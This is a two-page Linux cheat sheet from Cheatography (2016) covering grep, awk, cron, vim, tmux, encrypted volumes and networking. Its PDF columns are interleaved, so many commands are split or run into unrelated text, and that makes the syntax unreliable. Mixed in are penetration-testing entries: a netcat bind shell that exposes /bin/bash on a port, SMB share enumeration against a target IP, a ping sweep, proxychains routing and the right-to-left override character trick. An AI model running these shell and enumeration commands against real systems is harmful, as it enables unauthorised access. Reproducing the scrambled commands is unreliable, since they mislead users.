Linux Things I Forget Cheat Sheet by fred via cheatography.com/22666/cs/9068/

AWK | CAT | GREP Boot Process Command Line Cheatsheet Monitoring & Processes (cont) AWK 1. Power on WATCH Find line number of IP 2. BIOS sudo pip install cheat watch ls (run ls every 2secs) awk '/197.12​ 8.145​ .39/{ 3. MBR - 1st sector of HDD cheat netstat TOP 4. GRUB print NR; exit }' ips.txt Cheatsh​ eets are stored in ~/.cheat/ top (view processes in detail) 5. Kernel CAT Edit a cheatsh​ eet htop (better alterna​ tive) 6. initramfs - Initial RAM disk With line numbers cheat -e foo CRON JOBS 7. init - /sbin/init (daemons and cat -n file.txt services) crontab -e (list and edit GREP 8. Command shell using getty ASCII Table & Calculator cronjobs) grep "h​ re​ f​ =​ " index.html | cut -d"/"​ - Generate your crontab line easily: 9. GUI - X Windows man ascii (show ascii table) f3 | grep icq.com | sort -u > Disable services from loading on http://​ cro​ nta​ b-g​ ene​ rat​ or.org/ ​ icqserv​ er​ .txt bc (command line calculator) login Count occurences of \x in systemctl disable apache2 SSL Certifi​ cates 1906.py Permiss​ ions (disable apache from auto-st​ arting cat 1906.py | grep -o \x |wc -l Follow instructions at - ​ on boot/lo​ gin) Change ownership https://certbot.eff.org/ Find line number of IP sudo chown username To generate an auto-re​ newal grep -n 197.128​ .14​ 5.39 ips.txt Unicode filename cronjob - Clone ownersh​ ip http://​ cro​ nta​ b-g​ ene​ rat​ or.org/ Network http://​ sup​ eru​ ser​ .co​ m/q​ ues​ tio​ ns/​ 594​ 18​ EXAMPLE: /how​ -to​ -ty​ pe-​ spe​ cia​ l-c​ har​ act​ ers​ - chown -- Show all eth network interfa​ ces, crontab -e in​ -linux refer​ enc​ e=o​ the​ rfile e.g. eth0, eth1... 17 3 * /root/c​ ert​ bot​ -auto renew -- Example - RTL Override thisfile dmesg | grep ^eth quiet --no-se​ lf-​ upg​ rade Hold CTRL+SH​ IFT+U, then type in Restart Network​ ing 202e FIND Hotkeys sudo service network​ - The invisible right-t​ o-left override Case insensi​ tive -iname ma​ nager restart character will be inserted and Nautilus (Switch views) Whatp​ ort​ is anything typed after this character sudo find -iname CTRL+1 pip install whatpor​ tis will be backwards. fileorf​ old​ ern​ ame CTRL+2 whatpo​ rtis 21 sudo find -iname CTRL+3 CTRL+H (show hidden) CIDR Calcula​ tion Command Line Cheatsheet fileorf​ old​ ern​ ame* CTRL+L (show location) sudo apt-get install Create and view interac​ tive Nautilus Graphical Mode Search sipcalc cheatsh​ eets on the command​ -line! XARGS ALT+F2 sipcalc 192.168​ .1.0/24 Set editor in path Pings​ weep Deleted files go to nano .bashrc (in your home echo 192.168​ .9.{20​ 0..250} "~​ /.lo​ ca​ l/s​ har​ e/T​ ras​ h/f​ ile​ s/"​ directory) DIFF & NDIFF (File Compari​ son) | xargs -n 1 -P0 ping -c Delete or CTRL+De​ lete = Move to export EDITOR=​ "/bi​ n/n​ ano​ " Trash diff file1 file2 (compare 1 | grep "b​ ytes from" Install and use cheat Shift+D​ elete = Permanent Delete files line by line) Run command against files from ndiff file1 file2 (compare 2 find nmap scans for changes) find * | xargs exiftool (Run exiftool against all files in current directory and subdire​ cto​ ries)

TREE (Directory Tree)

Show a directory tree tree directo​ ryn​ ame

By fred Published 9th September, 2016. Sponsored by CrosswordCheats.com cheatography.com/fred/ Last updated 12th October, 2016. Learn to solve cryptic crosswords! Page 1 of 2. http://crosswordcheats.com Linux Things I Forget Cheat Sheet by fred via cheatography.com/22666/cs/9068/

VI & VIM Multiple Commands IP Assignment SMB (Samba, NETBIOS) (cont)

I / INS = Insert Mode cat rubbish​ .txt; ls MANUAL smbclient -I SELEC​ TING TEXT Note: Changes are nonpers​ ist​ ent. 192.168​ .92​ .131 -R v = select range Netcat Bind Shell To make changes permanent, edit virnet.com -N -U (capital i, -R V = select entire line ​ ​ ​ ​ ​ /etc/network/interfaces file. = domain, -N = no pass, -U = user)​ d = delete selected text Victim ifconfig eth0 nc -lvvp 2345 -e COPY/​ PAS​ TE 192.168​ .72​ .10​ 0/24 (configure TMUX /bin/bash y = copy selection IP) yy = copy line https:/​ /da​ nie​ lmi​ ess​ ler​ .co​ m/s​ tud​ y/t​ mu Attac​ ker route add default gw p = paste before cursor ​ x/ nc -vn 192.168.1.177 2345 192.168​ .72.2 (add gateway) DELETE ssh [email protected] echo nameserver 4.2.2.2 > dd = delete line tmux Base64 Encode & Decode etc/res​ olv​ .conf (add DNS to x = cut selected text nmap -A etc... d$ = delete from cursor to end of python resolv.conf) CTRL+B, D (to exit and keep line ​ ​ ​ ​ ​ ​ AUTO "blah".encode('base64') session running) UNDO / REDO dhclient eth0 "YXN​ jaW​ kxL​ nR4​ dA=​ =".de​ co​ de(​ If the session dies u = undo last action ifconfig 'ba​ se6​ 4') ssh [email protected] CTRL+R = redo last action killall dhclient tmux attach (to connect to first EXIT ps -ef | grep dhclient Encrypted Volumes available session) ZZ = save and quit :w = save http://​ ask​ ubu​ ntu​ .co​ m/q​ ues​ tio​ ns/​ 635​ 94​ Proxych​ ains :q! = quit without saving /mou​ nt-​ enc​ ryp​ ted​ -vo​ lum​ es-​ VNC Server

FIND AND REPLACE fro​ m-c​ omm​ and​ -li​ ne#​ 63598 http://​ pro​ xyc​ hai​ ns.sou​ rce​ for​ ge.net​ /ho​ apt-get install :%s/eth​ 0/b​ r0/g = find eth0 and sudo apt-get install wto​ .html tightvn​ cse​ rver replace with br0 cryptse​ tup /etc/p​ rox​ ych​ ain​ s.co​ nf vncser​ ver :%s##b​ lah#g = find Decrypt & Mount (usage info) You will require a password to and replace with blah proxyc​ hains firefox sudo cryptsetup luksOpen access your desktop​ s... google.com /dev/sda1 View only password? n NANO my_encr​ ypt​ ed_​ vol​ ume Resolve google.com through proxy netstat -antp | grep vnc specified by proxych​ ain​ s.conf Copy and Paste sudo mkdir (usually runs on port 5901) ALT+6 and CTRL+U /media/​ my_​ dev​ ice Show line numbers SMB (Samba, NETBIOS) sudo mount nano -c filename /dev/ma​ ppe​ r/m​ y_e​ ncr​ ypt​ ed_​ v RPCCl​ ient olume /media/​ my_​ dev​ ice http://​ car​ nal​ 0wn​ age​ .at​ tac​ kre​ sea​ rch​ .c​ Output om/2​ 010​ /06​ /mo​ re-​ Unmount & Lock wit​ h-r​ pcc​ lie​ nt.html To screen and file sudo umount enum4l​ inux -U -o command1 2>&1 | tee /media/​ my_​ dev​ ice 192.168​ .1.200 log.txt sudo cryptsetup luksClose SMBCl​ ient ls -al | tee file.txt my_encr​ ypt​ ed_​ vol​ ume smbclient -L //TARGE​ TIP Append to screen and file Auto-​ mount to Location (​ list shares)​ command1 | tee -a log.txt sudo udisks --mount smbclient //TARGE​ TIP​ /tmp /dev/ma​ ppe​ r/m​ y_e​ ncr​ ypt​ ed_​ v (connect to tmp folder) ol​ ume

By fred Published 9th September, 2016. Sponsored by CrosswordCheats.com cheatography.com/fred/ Last updated 12th October, 2016. Learn to solve cryptic crosswords! Page 2 of 2. http://crosswordcheats.com